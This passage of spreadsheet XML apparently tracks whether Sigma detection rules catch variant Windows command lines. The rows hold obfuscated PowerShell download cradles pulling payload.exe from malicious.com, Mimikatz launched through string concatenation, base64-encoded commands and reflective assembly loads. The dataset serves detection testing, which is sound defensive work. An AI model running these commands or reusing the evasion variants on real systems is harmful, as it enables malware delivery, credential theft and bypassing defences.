          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4360" s="43" t="n"/>
      <c r="K4360" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4361" ht="15.75" customHeight="1" s="42">
      <c r="A4361" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B4361" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C4361" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D4361" s="43" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E4361" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d C:\Users\Public\ &amp;&amp; cscript script.vbs"</t>
        </is>
      </c>
      <c r="F4361" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4361" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4361" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4361" s="43" t="n"/>
      <c r="J4361" s="43" t="n"/>
      <c r="K4361" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4362" ht="15.75" customHeight="1" s="42">
      <c r="A4362" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B4362" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C4362" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D4362" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E4362" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wbem\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F4362" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4362" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4362" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4362" s="43" t="n"/>
      <c r="K4362" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4363" ht="15.75" customHeight="1" s="42">
      <c r="A4363" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4363" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4363" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4363" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4363" s="43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4363" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4363" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4363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63" s="43" t="n"/>
      <c r="K4363" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4364" ht="15.75" customHeight="1" s="42">
      <c r="A4364" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4364" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4364" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4364" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4364" s="43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4364" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4364" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4364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4364" s="43" t="n"/>
      <c r="K4364" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4365" ht="15.75" customHeight="1" s="42">
      <c r="A4365" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4365" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4365" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4365" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4365" s="43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4365" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4365" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4365" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4365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65" s="43" t="n"/>
      <c r="K4365" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4366" ht="15.75" customHeight="1" s="42">
      <c r="A4366" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4366" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4366" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4366" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4366" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F4366" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4366" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4366" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4366" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J4366" s="43" t="n"/>
      <c r="K4366" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4367" ht="15.75" customHeight="1" s="42">
      <c r="A4367" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4367" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4367" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4367" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4367" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F4367" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4367" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4367" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4367" s="43" t="n"/>
      <c r="J4367" s="43" t="n"/>
      <c r="K4367" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4368" ht="15.75" customHeight="1" s="42">
      <c r="A4368" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B4368" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4368" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4368" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4368" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F4368" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4368" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4368" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4368" s="43" t="n"/>
      <c r="J4368" s="43" t="n"/>
      <c r="K4368" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4369" ht="15.75" customHeight="1" s="42">
      <c r="A4369" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4369" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4369" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4369" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4369" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F4369" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4369" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4369" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4369" s="43" t="n"/>
      <c r="K4369" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4370" ht="15.75" customHeight="1" s="42">
      <c r="A4370" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4370" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4370" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4370" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4370" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F4370" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4370" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4370" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4370" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4370" s="43" t="n"/>
      <c r="K4370" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4371" ht="15.75" customHeight="1" s="42">
      <c r="A4371" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4371" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4371" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4371" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4371" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F4371" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4371" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4371" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4371" s="43" t="n"/>
      <c r="J4371" s="43" t="n"/>
      <c r="K4371" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4372" ht="15.75" customHeight="1" s="42">
      <c r="A4372" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4372" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4372" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4372" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4372" s="43" t="inlineStr">
        <is>
          <t>powershell -"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F4372" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4372" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4372" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4372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4372" s="43" t="n"/>
      <c r="K4372" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4373" ht="15.75" customHeight="1" s="42">
      <c r="A4373" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4373" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4373" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4373" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4373" s="43" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F4373" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4373" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4373" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4373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4373" s="43" t="n"/>
      <c r="K4373" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4374" ht="15.75" customHeight="1" s="42">
      <c r="A4374" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4374" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4374" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4374" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4374" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F4374" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4374" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4374" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4374" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4374" s="43" t="n"/>
      <c r="K4374" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4375" ht="15.75" customHeight="1" s="42">
      <c r="A4375" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4375" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4375" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4375" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4375" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F4375" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4375" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4375" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4375" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4375" s="43" t="n"/>
      <c r="K4375" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4376" ht="15.75" customHeight="1" s="42">
      <c r="A4376" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4376" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4376" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4376" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4376" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F4376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4376" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4376" s="43" t="n"/>
      <c r="K4376" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4377" ht="15.75" customHeight="1" s="42">
      <c r="A4377" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4377" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4377" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4377" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4377" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F4377" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4377" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I437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4377" s="43" t="n"/>
      <c r="K4377" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4378" ht="15.75" customHeight="1" s="42">
      <c r="A4378" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4378" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C4378" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D4378" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E4378" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F4378" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4378" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4378" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4378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4378" s="43" t="n"/>
      <c r="K4378" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4379" ht="15.75" customHeight="1" s="42">
      <c r="A4379" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B4379" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C4379" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D4379" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E4379" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F4379" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4379" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4379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4379" s="43" t="n"/>
      <c r="K4379" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4380" ht="15.75" customHeight="1" s="42">
      <c r="A4380" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B4380" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C4380" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D4380" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E4380" s="43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F4380" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4380" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4380" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4380" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J4380" s="43" t="n"/>
      <c r="K4380" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4381" ht="15.75" customHeight="1" s="42">
      <c r="A4381" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B4381" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4381" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4381" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4381" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F4381" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4381" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4381" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4381" s="43" t="n"/>
      <c r="J4381" s="43" t="n"/>
      <c r="K4381" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4382" ht="15.75" customHeight="1" s="42">
      <c r="A4382" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B4382" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4382" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4382" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4382" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4382" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4382" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4382" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4382" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4382" s="43" t="n"/>
      <c r="K4382" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4383" ht="15.75" customHeight="1" s="42">
      <c r="A4383" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B4383" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4383" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4383" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4383" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4383" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4383" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4383" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4383" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4383" s="43" t="n"/>
      <c r="K4383" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4384" ht="15.75" customHeight="1" s="42">
      <c r="A4384" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B4384" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4384" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4384" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4384" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEDCOmmAnD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4384" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4384" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4384" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4384" s="43" t="n"/>
      <c r="K4384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4385" ht="15.75" customHeight="1" s="42">
      <c r="A4385" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B4385" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4385" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4385" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4385" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcoMmaNd WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4385" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4385" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4385" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4385" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
